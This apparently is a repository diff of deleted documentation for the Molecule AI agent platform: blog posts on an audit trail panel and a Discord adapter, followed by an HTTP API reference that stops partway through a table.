Each entry is color-coded by type, making it immediately visible at a glance whether you're looking at a routine delegation or a human-authorized escalation. The panel supports cursor-based pagination — "Load more" appends the next page, so there's no hard ceiling on how far back the trail goes.
## Tamper Evidence: Chain Validity Indicators
Here is the feature that separates an audit log from an audit trail.
Each entry carries a `chain_valid` flag. When the Molecule AI backend detects that an event's cryptographic chain has been broken — that the entry may have been modified, deleted, or inserted after the fact — the ledger renders a red ⚠ indicator with accessible `aria-label` and `title` text.
This is not a real-time intrusion detection system. It is evidence. When an auditor asks "can you prove this log wasn't altered after the fact?", the chain validity indicator is the answer.
## Filtering by Event Type
The filter bar at the top of the Audit Trail panel lets you isolate a single event type — all Delegation events, all Gates, all HITL checkpoints. Clicking a filter resets the page and re-fetches with the `?event_type=` parameter. The active filter shows `aria-pressed` state for accessibility.
For compliance workflows, this means: "show me every human-in-the-loop gate this agent passed in the last 30 days" is one filter click and one scroll.
## Enterprise Observability: The Layer Above Fleet Visibility
Phase 30 gave operators fleet visibility — the ability to see every agent, everywhere, on one canvas. The Audit Trail Panel gives them **operational visibility**: the ability to understand *what happened* inside any individual agent's session, after the fact.
These two features layer on top of each other. Fleet visibility tells you where your agents are and what state they're in right now. The audit trail tells you what they did, what decisions they made, and whether those decisions were authorized.
For enterprises deploying AI agents in regulated environments — financial services, healthcare, legal ops, infrastructure — this is the observability stack that makes a production deployment defensible.
## Where the Audit Trail Fits in the Phase 30 Story
Phase 30 shipped per-workspace bearer tokens, giving every agent a cryptographic identity. The Audit Trail Panel is the observability layer that makes that identity useful: every API call made with a per-workspace token is now attributable to a specific agent, in a specific session, with a specific outcome.
Combined with org-scoped API keys (which carry audit prefixes across every API call at the org level), Molecule AI now has a two-layer audit story: token-level attribution in API logs, and event-level attribution in the Canvas audit trail. Teams running production agents can answer "which agent did what, when, and was it authorized?" without stitching together a custom logging pipeline.
## Get Started
The Audit Trail Panel is live on all Canvas instances as of the 2026-04-17 release.
- Open any workspace on the Canvas
- Click the **Audit** tab (⊟) in the SidePanel
- Filter by event type, scroll back through the history
- Look for the ⚠ indicator to confirm chain validity
The panel requires no configuration, no plugin install, and no export step. It's already there.

View File

@ -1,80 +0,0 @@
---
title: "Your AI Agents, Live in Discord: Discord Adapter Ships on Molecule AI"
description: "Molecule AI's Discord adapter connects AI agent workspaces to Discord servers via slash commands and webhooks — no polling, no bot token management, no separate setup required beyond a webhook URL."
publishedAt: 2026-04-21
tags: [channels, discord, integrations, platform]
---
The same question that comes up every time someone deploys an AI agent team: *can we talk to it from where our team already communicates?*
For many teams, that place is Discord. Not as a notification sink — as a working interface. Teams run standups, triage issues, and coordinate deployments in Discord channels. The idea of switching to a web UI or a separate tool to interact with an agent feels like a step backward.
Molecule AI's Discord adapter makes that unnecessary.
## How the Discord Adapter Works
The adapter connects an AI agent workspace to a Discord channel using two standard Discord features: **Incoming Webhooks** (for outbound messages) and **Discord Interactions** (for inbound slash commands).
**Setup is minimal.** You provide a Discord Incoming Webhook URL — the one that Discord generates when you add a webhook to any channel. That's it. No bot creation in the Developer Portal, no OAuth flow, no Gateway setup. The webhook URL encodes the channel and bot credentials, so a single URL is all the adapter needs to send and receive.
On the inbound side, Discord delivers slash command interactions as signed JSON POSTs to your Interactions endpoint. The adapter parses the interaction, reconstructs the slash command as text (`/ask what's our deployment status`), and passes it to the agent as a standard inbound message.
On the outbound side, the agent's response is sent back to the same Discord channel via the webhook. Messages longer than 2000 characters are automatically split at word boundaries.
## Slash Commands as the Interface
Discord bots in guilds can only read messages they have specific permissions for. The Discord adapter sidesteps this entirely by using **slash commands** as the only inbound interface.
Users invoke the agent by typing a slash command:
```
/ask what's our current deployment status?
/ask any open incidents?
/ask summarize the last 24 hours of test results
```
The command name and options are extracted from the Discord Interactions payload and reconstructed as plain text for the agent. The agent's response goes back to the same channel via the webhook.
This means:
- No message reading permissions required
- No rate limit concerns from polling
- Clean, deliberate interaction model — users invoke the agent explicitly
## How It Fits Into the Agent Hierarchy
A Discord channel connected to a workspace becomes part of the agent hierarchy like any other channel. The Community Manager agent can be the primary interface — it receives the slash command, routes it to the right sub-agent (Security Auditor, QA Engineer, PM), and returns the answer to Discord.
```
Discord server
↓ slash command
Community Manager (Molecule AI workspace)
↓ delegate_task
Security Auditor / QA Engineer / PM
↓ response
Discord channel ← answer
```
The routing is invisible to the Discord user. They see a single response from the Community Manager, with the sub-agent delegation happening entirely within the Molecule AI platform.
## Connecting to Canvas
The Discord adapter is managed from the **Channels** tab in Canvas, alongside Telegram and other social channels. From there you can:
- Connect a Discord channel with a webhook URL
- Set an allowlist of Discord user IDs or roles (optional — empty means allow everyone)
- Send a test message to verify the connection
- View channel status and message counts
The adapter also works via API: `POST /workspaces/:id/channels` with `channel_type: "discord"` and the webhook URL in the config.
## Security Notes
Discord Interactions payloads are verified at the router layer before reaching the adapter — requests without a valid signature are rejected before any parsing occurs.
Webhook URLs contain embedded credentials and are stored masked in the database. Error messages throughout the adapter intentionally do not wrap the full webhook URL to prevent credentials leaking into logs or error responses.
## What's Next
Discord is the third platform adapter, following Telegram. Slack and WhatsApp are next on the roadmap.
If you're already running Molecule AI agents and want to connect a Discord server, the Channels tab in Canvas is where to start. The adapter is live now.

View File

@ -1,754 +0,0 @@
---
title: API Reference
description: Complete reference for all Molecule AI Platform HTTP and WebSocket endpoints.
---
# API Reference
The Molecule AI Platform exposes a REST API (default port 8080) for workspace management, agent registry, communication, and administration. All endpoints return JSON unless otherwise noted.
<Callout type="warn">
**Breaking changes — PR #701 (2026-04-17)**
- **`PATCH /workspaces/:id` now requires authentication.** Previously, requests without a bearer token could update cosmetic fields (name, x/y position). All `PATCH` calls now require `Authorization: Bearer <workspace-token>` or receive **401 Unauthorized**.
- **`GET /templates` and `GET /org/templates` now require AdminAuth.** Unauthenticated callers receive **401 Unauthorized**.
- **All `/workspaces/:id` endpoints validate the `:id` path parameter** as a UUID. Non-UUID values return **400 Bad Request** before any database interaction.
**Migration:** add `Authorization: Bearer <workspace-token>` to all `PATCH /workspaces/:id` calls. Use an admin bearer token for `GET /templates` and `GET /org/templates`. Ensure `:id` values in automation scripts are valid UUIDs.
</Callout>
**Base URL:** `http://localhost:8080` (self-hosted) or `https://api.moleculesai.app` (SaaS)
---
## Authentication Model
The platform uses three authentication middleware variants depending on the sensitivity of the route.
### AdminAuth
Strict bearer-token authentication. Required for any route where a forged request could leak prompts/memory, create/mutate workspaces, or leak operational data.
```
Authorization: Bearer <token>
```
**Fail-open behavior:** When no live tokens exist globally (fresh install), AdminAuth passes all requests through. Once the first token is created, all AdminAuth routes require a valid bearer.
### WorkspaceAuth
Per-workspace bearer token binding. Workspace A's token cannot access workspace B's sub-routes. Used for the entire `/workspaces/:id/*` group (except the A2A proxy, which uses `CanCommunicate`).
```
Authorization: Bearer <workspace-token>
```
### CanvasOrBearer
Accepts either a valid bearer token OR a request whose `Origin` header matches `CORS_ORIGINS`. Used only for cosmetic-only routes where a forged request has zero data/security impact.
Currently applies only to `PUT /canvas/viewport`. Do not extend to data-sensitive routes.
---
## Health and Monitoring
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/health` | None | Returns `200 OK` if the platform is running. Use for load balancer health checks. |
| GET | `/metrics` | None | Prometheus text format (v0.0.4) metrics. Scrape-safe, no auth required. |
| GET | `/admin/liveness` | AdminAuth | Per-subsystem `supervised.Snapshot()` ages. Check before debugging stuck scheduler/heartbeat goroutines. |
---
## Workspaces
Core workspace CRUD and lifecycle operations.
### CRUD
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces` | AdminAuth | Create a new workspace. Accepts `name`, `runtime`, `template`, `parent_id`, `tier`, `workspace_dir`, and other fields. Runtime is auto-detected from template config if omitted (defaults to `langgraph`). |
| GET | `/workspaces` | AdminAuth | List all workspaces with status, runtime, agent card, position, and hierarchy info. |
| GET | `/workspaces/:id` | WorkspaceAuth | Get a single workspace by ID. |
| PATCH | `/workspaces/:id` | WorkspaceAuth | Update workspace fields. A workspace bearer token is always required — unauthenticated calls return 401. Validates field constraints: `name` ≤ 255 chars, `role` ≤ 1,000 chars, `model` and `runtime` ≤ 100 chars each; `name` and `role` must not contain newlines (`\\n`, `\\r`) or YAML-special characters (`{}[]|>*&!`). Oversized or invalid field values return 400. `:id` must be a valid UUID. Financial fields (`budget_limit`) are not accepted here — use `PATCH /workspaces/:id/budget` (AdminAuth). |
| DELETE | `/workspaces/:id` | AdminAuth | Delete a workspace. Stops the container, revokes all auth tokens, and removes all associated data. |
### Lifecycle
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/restart` | WorkspaceAuth | Restart the workspace container. Sends a `restart_context` A2A message after successful re-registration. |
| POST | `/workspaces/:id/pause` | WorkspaceAuth | Stop the container and set status to `paused`. Paused workspaces skip health sweep, liveness monitor, and auto-restart. Resume manually via `/resume`. |
| POST | `/workspaces/:id/resume` | WorkspaceAuth | Re-provision a paused workspace. Status transitions to `provisioning`. |
| POST | `/workspaces/:id/hibernate` | WorkspaceAuth | Immediately hibernate a workspace (stop container, set status to `hibernated`). Useful for manual cost control. See hibernation note below. |
<Callout type="info">
**Workspace hibernation**
A workspace with `hibernation_idle_minutes` set in its config will be **automatically hibernated** by the platform after that many idle minutes (no active tasks, no recent heartbeat). The monitor checks every 2 minutes.
`hibernated` differs from `paused`:
- **`paused`** — manual, resumes only via `POST /resume`.
- **`hibernated`** — automatic (or via `POST /hibernate`), resumes **automatically** when an A2A message arrives.
When a message is sent to a hibernated workspace, the platform returns:
```
HTTP 503 Retry-After: 15
{"waking": true}
```
Callers should retry after ~15 seconds. The workspace typically returns to `online` within that window.
To opt a workspace into auto-hibernation, add to its `config.yaml`:
```yaml
hibernation_idle_minutes: 30 # hibernate after 30 min idle; null (default) = disabled
```
**Atomic hibernation guarantee:** The platform uses a single atomic SQL claim (`UPDATE … WHERE active_tasks = 0`) before stopping the container. If a task arrives between the idle check and the container stop, the claim fails and hibernation is aborted — no in-flight tasks are silently lost.
</Callout>
### Budget
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/budget` | AdminAuth | Read a workspace's current spend and ceiling. Returns `budget_limit`, `monthly_spend`, and `budget_remaining` (all in USD cents). |
| PATCH | `/workspaces/:id/budget` | AdminAuth | Set or clear a workspace's monthly spend ceiling. Body: `{ "budget_limit": N }` (positive integer, USD cents) or `{ "budget_limit": null }` to remove the cap. Negative values → 400. Returns same shape as GET. |
**Request / response shape:**
```json
// PATCH request body
{ "budget_limit": 500 } // $5.00/month ceiling
{ "budget_limit": null } // no ceiling
// GET and PATCH success response (200)
{
"budget_limit": 500, // null when no ceiling
"monthly_spend": 312, // accumulated spend this period, USD cents
"budget_remaining": 188 // null when no ceiling; max(0, limit-spend) — can be negative
}
```
<Callout type="warn">
**`budget_limit` and `monthly_spend` are absent from `GET /workspaces/:id`**
Financial fields are stripped unconditionally from the workspace detail
response — they do not appear for any caller, authenticated or not. Always
use `GET /workspaces/:id/budget` (AdminAuth) to read spend data.
`budget_limit` is also **not** accepted on the general `PATCH /workspaces/:id`
endpoint. Use the dedicated `/budget` route.
</Callout>
<Callout type="info">
**Enforcement and fail-open behaviour**
When `monthly_spend >= budget_limit`, `POST /workspaces/:id/a2a` returns:
```
HTTP 402 Payment Required
{"error": "workspace budget limit exceeded"}
```
Channel sends (Slack, Telegram, Discord, Lark) are also budget-gated with
the same 402 response. The workspace itself is **not paused** — it keeps
running; only inbound A2A and channel traffic is blocked.
**Fail-open:** if the budget check encounters a DB error, traffic is allowed
through rather than blocked. The spend ceiling is a soft guardrail, not a
hard guarantee.
</Callout>
---
## Registry
Workspace registration and heartbeat endpoints. Called by workspace runtimes, not by end users.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/registry/register` | None | Register a workspace with the platform. Sets status to `online`. Body includes agent URL, agent card, capabilities. |
| POST | `/registry/heartbeat` | Bearer (if token exists) | Send a heartbeat. Updates Redis TTL key (60s expiry). Body can include `active_tasks`, `current_task`, `error_rate`. Triggers `degraded` status if `error_rate > 0.5`. |
| POST | `/registry/update-card` | Bearer (if token exists) | Update the workspace's agent card (name, description, skills, etc.). |
---
## Discovery
Peer discovery and access control verification.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/registry/discover/:id` | Bearer + `X-Workspace-ID` | Discover a workspace's agent card and URL. Requires caller identification. Fails open on DB hiccup since hierarchy check is primary. |
| GET | `/registry/:id/peers` | Bearer + `X-Workspace-ID` | List all peers (siblings, parent, children) that the caller can communicate with. |
| POST | `/registry/check-access` | None | Check whether two workspaces can communicate. Body: `{ "caller_id": "...", "target_id": "..." }`. Returns `{ "allowed": true/false }`. |
---
## Communication
### A2A Proxy
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/a2a` | CanCommunicate | Proxy an A2A JSON-RPC message to the target workspace. Caller identified via `X-Workspace-ID` header. Canvas requests (no header) bypass access check. On connection error, checks if container is dead and triggers auto-restart. |
### Delegation
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/delegate` | WorkspaceAuth | Async fire-and-forget delegation. Supports idempotency keys. Body includes target workspace, prompt, and metadata. |
| GET | `/workspaces/:id/delegations` | WorkspaceAuth | List delegation status for a workspace. Returns delegation rows with status, result, timestamps. |
---
## Configuration
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/config` | WorkspaceAuth | Get the workspace's `config.yaml` contents. |
| PATCH | `/workspaces/:id/config` | WorkspaceAuth | Update the workspace config. "Save & Restart" writes config and auto-restarts; "Save" writes only and shows a restart banner in the Canvas. |
---
## Secrets
### Per-Workspace Secrets
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/secrets` | WorkspaceAuth | List secret keys for a workspace (keys only, values masked). |
| POST | `/workspaces/:id/secrets` | WorkspaceAuth | Set a secret `{ "key": "...", "value": "..." }`. Auto-restarts the workspace. |
| PUT | `/workspaces/:id/secrets` | WorkspaceAuth | Alias for POST (upsert semantics). Auto-restarts the workspace. |
| DELETE | `/workspaces/:id/secrets/:key` | WorkspaceAuth | Delete a secret by key. Auto-restarts the workspace. |
| GET | `/workspaces/:id/model` | WorkspaceAuth | Return the model configuration derived from available API keys (which provider keys are set). |
### Global Secrets
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/settings/secrets` | AdminAuth | List global secrets (keys only, values masked). |
| PUT | `/settings/secrets` | AdminAuth | Set a global secret `{ "key": "...", "value": "..." }`. Auto-restarts every non-paused/non-removed workspace that does not shadow the key with a workspace-level override. |
| POST | `/settings/secrets` | AdminAuth | Alias for PUT. |
| DELETE | `/settings/secrets/:key` | AdminAuth | Delete a global secret. Same auto-restart fan-out as PUT. |
Legacy aliases `GET/POST/DELETE /admin/secrets[/:key]` also exist and behave identically.
---
## Memory
### Key-Value Memory
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/memory` | WorkspaceAuth | List all key-value memory entries for a workspace. |
| POST | `/workspaces/:id/memory` | WorkspaceAuth | Set a memory entry `{ "key": "...", "value": "..." }`. |
| DELETE | `/workspaces/:id/memory/:key` | WorkspaceAuth | Delete a memory entry by key. |
### Agent Memories (HMA-scoped)
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/memories` | WorkspaceAuth | List or search agent memories. Supports `?q=` for semantic search (see below). |
| POST | `/workspaces/:id/memories` | WorkspaceAuth | Create an agent memory entry. |
| DELETE | `/workspaces/:id/memories/:id` | WorkspaceAuth | Delete an agent memory by ID. |
#### Semantic search (`?q=`)
When a platform-level embedding function is configured, passing `?q=<text>`
on `GET /workspaces/:id/memories` triggers vector similarity search instead of
the default full-text / ILIKE path:
```
GET /workspaces/{id}/memories?q=authentication+flow&limit=10
Authorization: Bearer {token}
```
Matching entries are returned **ordered by cosine similarity** (most similar
first). Each row includes an additional `similarity_score` field (01, higher
is closer):
```json
[
{
"id": "mem_abc123",
"key": "auth-design",
"value": "We use short-lived JWTs issued by the platform and refreshed via /auth/token.",
"similarity_score": 0.91,
"created_at": "2026-04-10T14:22:00Z"
}
]
```
**Graceful fallback**: if no embedding function is configured, or if the
embedding call fails for a given query, the platform falls back transparently
to the text-search path. The `similarity_score` field is absent in fallback
responses. You do not need to change client code to handle both modes.
---
## Files
Workspace file management. Files are stored in the workspace's config directory.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/files` | WorkspaceAuth | List files in the workspace config directory. |
| GET | `/workspaces/:id/files/*path` | WorkspaceAuth | Read a specific file. |
| PUT | `/workspaces/:id/files/*path` | WorkspaceAuth | Write a file. Creates parent directories as needed. |
| DELETE | `/workspaces/:id/files/*path` | WorkspaceAuth | Delete a file. |
| GET | `/workspaces/:id/shared-context` | WorkspaceAuth | Get the shared context files for a workspace (aggregated from parent hierarchy). |
---
## Activity
Activity logging and search for A2A communications, task updates, and agent logs.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/activity` | WorkspaceAuth | List activity logs for a workspace. Supports `?source=canvas` or `?source=agent` filter, and `?type=delegation` for A2A topology overlay polling. |
| POST | `/workspaces/:id/activity` | WorkspaceAuth | Log an activity entry (used by workspace runtimes to self-report). |
| POST | `/workspaces/:id/notify` | WorkspaceAuth | Agent-to-user push message via WebSocket. Delivers a notification to connected Canvas clients. |
---
## Audit Ledger
Tamper-evident audit trail for workspace events. Used by the Canvas Audit Trail panel.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/audit` | WorkspaceAuth | List audit entries for a workspace. Supports `?event_type=delegation\|decision\|gate\|hitl`, `?cursor=<cursor>`, and `?limit=<n>` (default 50). |
### Audit entry schema
| Field | Type | Description |
|-------|------|-------------|
| `id` | string | Unique entry ID |
| `event_type` | string | `delegation`, `decision`, `gate`, or `hitl` |
| `actor` | string | Workspace ID that generated the event |
| `summary` | string | Human-readable event description |
| `chain_valid` | bool | `false` if the entry's hash does not match the prior chain — indicates possible tampering |
| `created_at` | string (ISO 8601) | Event timestamp |
| `cursor` | string \| null | Opaque pagination cursor; `null` when there are no more entries |
Example response:
```json
{
"entries": [
{
"id": "aud_xyz789",
"event_type": "delegation",
"actor": "ws_abc123",
"summary": "Delegated task 'fix CI' to Backend Engineer",
"chain_valid": true,
"created_at": "2026-04-17T14:05:00Z"
}
],
"cursor": "eyJpZCI6ImF1ZF94eXo3ODkifQ"
}
```
### Session Search
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/session-search` | WorkspaceAuth | Search activity logs with filters for type, date range, and text content. Returns paginated results. |
---
## Workflow Checkpoints
Step-level progress persistence for long-running Temporal workflows. Workspaces with `runtime: langgraph` (Temporal) automatically save a checkpoint after each of the three workflow stages (`task_receive`, `llm_call`, `task_complete`) and resume from the last completed stage on restart.
<Callout type="info">
**Automatic resume behavior (runtime: langgraph only)**
When a Temporal workspace restarts mid-workflow, the runtime reads the highest-index checkpoint and sets `resume_from_step` accordingly. Already-completed stages are skipped — the agent picks up exactly where it left off without re-running earlier steps.
Checkpoint I/O is non-fatal: network errors are silently swallowed. A crashed or unreachable platform never prevents the agent from running.
</Callout>
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/checkpoints` | WorkspaceAuth | Upsert a step checkpoint. Body: `{ "workflow_id": "...", "step_name": "task_receive\|llm_call\|task_complete", "step_index": 0, "payload": {...} }`. Uses `ON CONFLICT DO UPDATE` — safe to call multiple times. |
| GET | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Return all checkpoints for a workflow, ordered by `step_index DESC`. Returns 404 if no checkpoints exist for the workflow. |
| DELETE | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Clear all checkpoints for a workflow. Called by the runtime on clean task completion. Returns 404 if none exist. |
**Step names and indices:**
| Step | `step_index` | Meaning |
|------|-------------|---------|
| `task_receive` | 0 | Task received from A2A message |
| `llm_call` | 1 | LLM inference completed |
| `task_complete` | 2 | Task result sent back to caller |
---
## Schedules
Cron-based scheduled tasks per workspace.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/schedules` | WorkspaceAuth | List all schedules for a workspace. |
| POST | `/workspaces/:id/schedules` | WorkspaceAuth | Create a schedule. Body: `{ "expression": "0 */6 * * *", "timezone": "UTC", "prompt": "...", "enabled": true }`. |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Update a schedule (expression, timezone, prompt, enabled). |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Delete a schedule. |
| POST | `/workspaces/:id/schedules/:scheduleId/run` | WorkspaceAuth | Manually trigger a schedule immediately. |
| GET | `/workspaces/:id/schedules/:scheduleId/history` | WorkspaceAuth | List past runs for a schedule. Includes status (`success`, `error`, `skipped`) and `error_detail`. |
Schedule `source` field: `template` for org/import-seeded schedules, `runtime` for Canvas/API-created. The `last_status` includes `skipped` when the scheduler concurrency-aware-skips a busy workspace.
---
## Channels
Social channel integrations (Telegram, Slack, etc.) for workspace agents.
### Per-Workspace Channels
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/channels` | WorkspaceAuth | List channels for a workspace. |
| POST | `/workspaces/:id/channels` | WorkspaceAuth | Create a channel. Body includes platform type, JSONB config, and allowlist. |
| PATCH | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Update a channel's config or allowlist. |
| DELETE | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Delete a channel. |
| POST | `/workspaces/:id/channels/:channelId/send` | WorkspaceAuth | Send an outbound message through the channel. |
| POST | `/workspaces/:id/channels/:channelId/test` | WorkspaceAuth | Test the channel connection (send a test message). |
### Global Channel Endpoints
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/channels/adapters` | None | List available social platform adapters (Telegram, Slack, etc.). |
| POST | `/channels/discover` | AdminAuth | Auto-detect available chats/groups for a bot token. |
| POST | `/webhooks/:type` | None | Incoming webhook endpoint for social platforms. The `:type` parameter identifies the platform (e.g., `telegram`, `slack`). |
---
## Plugins
Plugin registry and per-workspace plugin management.
### Global Plugin Registry
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/plugins` | None | List all plugins in the registry. Supports `?runtime=` filter to show only compatible plugins. |
| GET | `/plugins/sources` | None | List registered install-source schemes (e.g., `github://`, `local://`). |
### Per-Workspace Plugins
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/plugins` | WorkspaceAuth | List installed plugins for a workspace. |
| POST | `/workspaces/:id/plugins` | WorkspaceAuth | Install a plugin. Body: `{ "source": "github://org/repo" }`. Safeguards: 64 KiB body limit, 5 min fetch timeout, 100 MiB max staged-tree. |
| DELETE | `/workspaces/:id/plugins/:name` | WorkspaceAuth | Uninstall a plugin by name. |
| GET | `/workspaces/:id/plugins/available` | WorkspaceAuth | List plugins available for this workspace (filtered by workspace runtime). |
| GET | `/workspaces/:id/plugins/compatibility` | WorkspaceAuth | Preflight runtime-change check. Query: `?runtime=X`. Returns which currently-installed plugins would be incompatible with the target runtime. |
---
## Auth Tokens
Bearer token management for workspaces.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/tokens` | WorkspaceAuth | List active tokens for a workspace (token values are masked). |
| POST | `/workspaces/:id/tokens` | WorkspaceAuth | Create a new bearer token for the workspace. |
| DELETE | `/workspaces/:id/tokens/:tokenId` | WorkspaceAuth | Revoke a specific token. |
### Test Token (Development Only)
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/admin/workspaces/:id/test-token` | None | Mint a fresh bearer token for E2E scripts. Returns 404 unless `MOLECULE_ENV != production` or `MOLECULE_ENABLE_TEST_TOKENS=1`. |
---
## Teams
Expand and collapse team views in the Canvas hierarchy.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/expand` | WorkspaceAuth | Expand a team workspace to show its children on the canvas. |
| POST | `/workspaces/:id/collapse` | WorkspaceAuth | Collapse a team workspace to hide its children. |
---
## Templates and Bundles
### Templates
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/templates` | AdminAuth | List available workspace templates with their runtime, description, and config schema. |
| POST | `/templates/import` | AdminAuth | Import a workspace template from a `github://` source URL. |
### Org Templates
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/org/templates` | AdminAuth | List available organization templates. |
| POST | `/org/import` | AdminAuth | Import an org template. Applies `resolveInsideRoot` path sanitization. Creates the full workspace hierarchy defined in `org.yaml`. |
### Bundles
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/bundles/export/:id` | AdminAuth | Export a workspace (or workspace tree) as a portable bundle. Includes config, secrets (keys only), memory, schedules, and hierarchy. |
| POST | `/bundles/import` | AdminAuth | Import a previously-exported bundle. Recreates the workspace tree with all associated data. |
---
## Approvals
Human-in-the-loop approval system for agent actions.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/approvals` | WorkspaceAuth | Create an approval request. Body includes the action description, metadata, and options. |
| GET | `/workspaces/:id/approvals` | WorkspaceAuth | List approval requests for a workspace. |
| POST | `/workspaces/:id/approvals/:id/decide` | WorkspaceAuth | Approve or reject an approval request. Body: `{ "decision": "approve" }` or `{ "decision": "reject" }`. |
| GET | `/approvals/pending` | AdminAuth | List all pending approval requests across all workspaces. |
---
## Canvas
Canvas viewport persistence (cosmetic only).
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/canvas/viewport` | None | Get the saved canvas viewport (zoom, pan position). Open endpoint for bootstrap-friendliness. |
| PUT | `/canvas/viewport` | CanvasOrBearer | Save the canvas viewport. Accepts bearer OR matching `Origin` header. Worst case on forgery: viewport corruption, recovered by page refresh. |
---
## Traces
LLM trace retrieval from Langfuse.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/traces` | WorkspaceAuth | List LLM traces for a workspace from Langfuse. |
---
## Audit Ledger
HMAC-SHA256-chained immutable agent event log for compliance record-keeping (EU AI Act Art. 12 / Art. 13). Each event is cryptographically chained to the previous one — tampering with any record breaks all subsequent HMACs.
<Callout type="warn">
**`AUDIT_LEDGER_SALT` required.** The platform and workspace containers must share the same `AUDIT_LEDGER_SALT` environment variable to compute and verify event HMACs. Set it in both your platform env and workspace container env. If the variable is absent, `chain_valid` returns `null` (not `false`) — no records are lost, verification is simply unavailable.
</Callout>
### Query
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/audit` | WorkspaceAuth | Query the audit ledger for a workspace. Returns events in descending chronological order with inline chain verification. |
**Query parameters:**
| Parameter | Type | Description |
|-----------|------|-------------|
| `agent_id` | string | Filter to a specific agent. |
| `session_id` | string | Filter to a specific session. |
| `from` | RFC 3339 | Start of time range (e.g. `2026-04-01T00:00:00Z`). |
| `to` | RFC 3339 | End of time range. |
| `limit` | int | Max records to return. Capped at **500**. |
| `offset` | int | Pagination offset. |
**Response shape:**
```json
{
"events": [
{
"id": "uuid",
"workspace_id": "uuid",
"agent_id": "my-researcher",
"session_id": "sess_abc123",
"event_type": "tool_call",
"payload": { "tool": "bash", "input": "ls /workspace" },
"hmac": "sha256hex...",
"prev_hmac": "sha256hex...",
"created_at": "2026-04-17T12:00:00Z"
}
],
"chain_valid": true
}
```
`chain_valid` values:
- `true` — all HMACs verified; ledger is intact.
- `false` — at least one HMAC mismatch; possible tampering.
- `null` — `AUDIT_LEDGER_SALT` is absent from the platform env; verification skipped.
### Workspace-side: recording events
In your workspace template, wire `LedgerHooks` into the agent pipeline:
```python
from molecule_audit.hooks import LedgerHooks
hooks = LedgerHooks(agent_id="my-researcher", session_id=session_id)
async with hooks:
# hooks.on_task_start / on_llm_call / on_tool_call / on_task_end
# fire automatically at each pipeline stage
result = await agent.run(task)
```
`LedgerHooks` is exception-safe — a failed ledger write never aborts the agent task.
### CLI chain verification
```bash
# Verify the full chain for an agent; exit 0 = intact
python -m molecule_audit.verify --agent-id my-researcher
# Custom DB URL
python -m molecule_audit.verify --agent-id my-researcher --db postgresql://user:pass@host/db
```
Exit codes: `0` = chain valid · `1` = broken chain · `2` = `AUDIT_LEDGER_SALT` missing · `3` = DB error.
---
## Events
Append-only event log for structure changes.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/events` | AdminAuth | List all structure events across all workspaces. |
| GET | `/events/:workspaceId` | AdminAuth | List structure events for a specific workspace. |
---
## Terminal
WebSocket-based terminal access to workspace containers.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| WS | `/workspaces/:id/terminal` | WorkspaceAuth | Open a WebSocket terminal session to the workspace container. Provides interactive shell access. |
---
## WebSocket
Real-time event streaming for Canvas clients.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| WS | `/ws` | None | Connect to the WebSocket hub. Receives all structure events (`WORKSPACE_ONLINE`, `WORKSPACE_OFFLINE`, `HEARTBEAT`, `CONFIG_UPDATED`, `A2A_RESPONSE`, `AGENT_MESSAGE`, etc.). Canvas clients connect here for real-time updates. |
---
## Server-Sent Events (AG-UI)
Per-workspace SSE stream compatible with the [AG-UI protocol](https://github.com/ag-ui-protocol/ag-ui). Use this endpoint to consume structured agent events from a web client or external tool without a WebSocket library.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
